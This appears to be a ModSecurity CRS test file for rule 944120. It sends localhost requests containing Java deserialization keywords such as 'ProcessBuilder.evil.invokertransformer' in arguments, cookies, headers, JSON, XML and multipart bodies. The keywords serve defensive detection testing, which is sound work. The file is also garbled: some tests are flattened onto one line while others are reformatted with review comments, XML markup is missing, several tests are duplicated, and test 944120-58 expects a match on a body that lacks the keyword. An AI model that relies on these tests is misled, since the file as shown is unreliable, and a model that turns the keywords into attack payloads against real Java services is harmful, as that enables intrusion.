log_contains: "id \"944120\"" - test_title: 944120-36 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-37 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.instantiatefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-38 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-39 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-40 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-41 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-42 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-43 desc: "Nested XML element value 
includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-44 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-45 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-46 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: 
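Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" output: log_contains: "id \"944120\""
# The line above is the tail of test 944120-46, which starts before this
# span; it is left as found. Tests 944120-47 to 944120-50 below are laid out
# one key per line.

# 944120-47: multipart part "payload" declared as application/json; the
# keyword is the JSON member name. Expects rule 944120 in the log.
- test_title: 944120-47
  desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          # NOTE(review): the blank line between the part headers and the part
          # body is restored as multipart syntax requires; the collapsed source
          # shows no line breaks - confirm against the repository copy.
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"ProcessBuilder.evil.instantiatefactory": "test"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# 944120-48: same request shape, keyword in the JSON member VALUE so that the
# payload matches desc; the member-name position is covered by 944120-47.
# NOTE(review): log_contains is kept on the assumption that the rule inspects
# the whole part body (944120-49 expects a match on a part body) - confirm
# with a test run.
- test_title: 944120-48
  desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"test": "ProcessBuilder.evil.instantiatefactory"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# 944120-49 / 944120-50: multipart part "payload" declared as application/xml.
# NOTE(review): the two tests are identical as shown, and the part body is the
# bare keyword although desc says "XML element value"; the XML markup may have
# been lost in this copy - compare with the repository file.
- test_title: 944120-49
  desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/xml

            ProcessBuilder.evil.instantiatefactory
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

- test_title: 944120-50
  desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/xml

            ProcessBuilder.evil.instantiatefactory
            -----------------------------thisissparta--
        output:
          # Quoted like every other expectation in this file; the parsed value
          # is the same string as the plain-scalar form.
          log_contains: "id \"944120\""

# Head of test 944120-51; the rest of it follows this span. Left as found.
- test_title: 944120-51 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: -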
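stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: log_contains: "id \"944120\""
# The line above is the tail of test 944120-51, which starts before this
# span; it is left as found. Tests 944120-52 to 944120-65 below are laid out
# one key per line. Each sends one POST to 127.0.0.1:80 and checks the log for
# rule id 944120 (log_contains) or for its absence (no_log_contains).

# 944120-52: keyword as a form-encoded argument name.
- test_title: 944120-52
  desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/x-www-form-urlencoded"
          method: "POST"
          version: "HTTP/1.0"
          data: "ProcessBuilder.evil.instantiatetransformer=test"
        output:
          log_contains: "id \"944120\""

# 944120-53: keyword as the value of cookie "test".
- test_title: 944120-53
  desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/x-www-form-urlencoded"
            Cookie: test=ProcessBuilder.evil.instantiatetransformer
          method: "POST"
          version: "HTTP/1.0"
          data: "test=value"
        output:
          log_contains: "id \"944120\""

# 944120-54: keyword as a cookie name.
- test_title: 944120-54
  desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/x-www-form-urlencoded"
            Cookie: ProcessBuilder.evil.instantiatetransformer=test
          method: "POST"
          version: "HTTP/1.0"
          data: "test=value"
        output:
          log_contains: "id \"944120\""

# 944120-55: keyword as the value of a request header named "test".
- test_title: 944120-55
  desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/x-www-form-urlencoded"
            test: ProcessBuilder.evil.instantiatetransformer
          method: "POST"
          version: "HTTP/1.0"
          data: "test=value"
        output:
          log_contains: "id \"944120\""

# 944120-56 to 944120-60: application/xml bodies.
# NOTE(review): the data values below contain no XML markup, and 944120-58
# expects a match on a body that, as shown, does not contain the keyword. The
# markup described in each desc appears to have been lost in this copy -
# restore it from the repository file before running these tests.
- test_title: 944120-56
  desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "value"
        output:
          # Negative case: the rule id must not appear in the log.
          no_log_contains: "id \"944120\""

- test_title: 944120-57
  desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "element_value"
        output:
          # Negative case: the rule id must not appear in the log.
          no_log_contains: "id \"944120\""

- test_title: 944120-58
  desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "element_value"
        output:
          log_contains: "id \"944120\""

- test_title: 944120-59
  desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "ProcessBuilder.evil.instantiatetransformer"
        output:
          log_contains: "id \"944120\""

- test_title: 944120-60
  desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/xml"
          method: "POST"
          version: "HTTP/1.0"
          data: "ProcessBuilder.evil.instantiatetransformer"
        output:
          log_contains: "id \"944120\""

# 944120-61: keyword in a text/plain request body.
- test_title: 944120-61
  desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "text/plain"
          method: "POST"
          version: "HTTP/1.0"
          data: "test=ProcessBuilder.evil.instantiatetransformer"
        output:
          log_contains: "id \"944120\""

# 944120-62: application/json body, keyword as a member value.
- test_title: 944120-62
  desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/json"
          method: "POST"
          version: "HTTP/1.0"
          data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}"
        output:
          log_contains: "id \"944120\""

# 944120-63: application/json body, keyword as a member name.
- test_title: 944120-63
  desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "application/json"
          method: "POST"
          version: "HTTP/1.0"
          data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}"
        output:
          log_contains: "id \"944120\""

# 944120-64: multipart part "payload" declared as application/json; the
# keyword is the JSON member name.
- test_title: 944120-64
  desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          # NOTE(review): the blank line between the part headers and the part
          # body is restored as multipart syntax requires; the collapsed source
          # shows no line breaks - confirm against the repository copy.
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"ProcessBuilder.evil.instantiatetransformer": "test"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# 944120-65: same request shape, keyword in the JSON member VALUE so that the
# payload matches desc; the member-name position is covered by 944120-64.
# NOTE(review): log_contains is kept on the assumption that the rule inspects
# the whole part body (the multipart XML element-value tests for this keyword
# expect a match on a part body) - confirm with a test run.
- test_title: 944120-65
  desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer"
  stages:
    - stage:
        input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            Host: "localhost"
            User-Agent: "ModSecurity CRS 3 Tests"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
            Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
            Accept-Encoding: "gzip,deflate"
            Accept-Language: "en-us,en;q=0.5"
            Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
          method: "POST"
          version: "HTTP/1.0"
          data: |
            -----------------------------thisissparta
            Content-Disposition: form-data; name="payload"
            Content-Type: application/json

            {"test": "ProcessBuilder.evil.instantiatetransformer"}
            -----------------------------thisissparta--
        output:
          log_contains: "id \"944120\""

# Head of test 944120-66; the rest of it follows this span. Left as found.
- test_title: 944120-66 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: -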
stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-68 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: log_contains: "id \"944120\"" - test_title: 944120-69 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer=test" output: log_contains: "id \"944120\"" - test_title: 944120-70 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-71 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: 
ProcessBuilder.evil.invokertransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-72 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-73 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-74 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-75 desc: "XML attribute value includes keyword 
